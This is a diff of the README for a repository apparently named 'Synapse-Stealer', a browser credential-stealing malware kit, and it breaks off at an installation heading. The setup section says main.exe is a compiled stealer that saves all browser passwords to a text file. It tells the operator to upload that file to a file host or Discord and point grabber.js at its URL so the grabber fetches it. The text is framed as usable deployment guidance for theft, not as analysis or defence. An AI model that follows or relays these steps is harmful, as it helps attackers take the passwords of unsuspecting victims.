5l1v3r1/Synapse-Stealer/README.md

 ## Setup

 **Uploading main.exe:**
- Main.exe is a compiled browser passwords stealer, it will save all passwords in a .txt We're using it since NodeJS isn't able yet to decrypt chromium passowrds.
+Main.exe is a compiled browser passwords stealer, it will save all passwords in a txt file.
+We're using it since NodeJS isn't able yet to decrypt chromium passowrds.
-Upload it in a file hosting website (or even send it to discord to someone and copy the url) and change the url in grabber.js line 143
+Upload it in a file hosting website (or even send it to discord to someone and copy the url) and change the url in grabber.js line 143.

 Installing:
 ```bash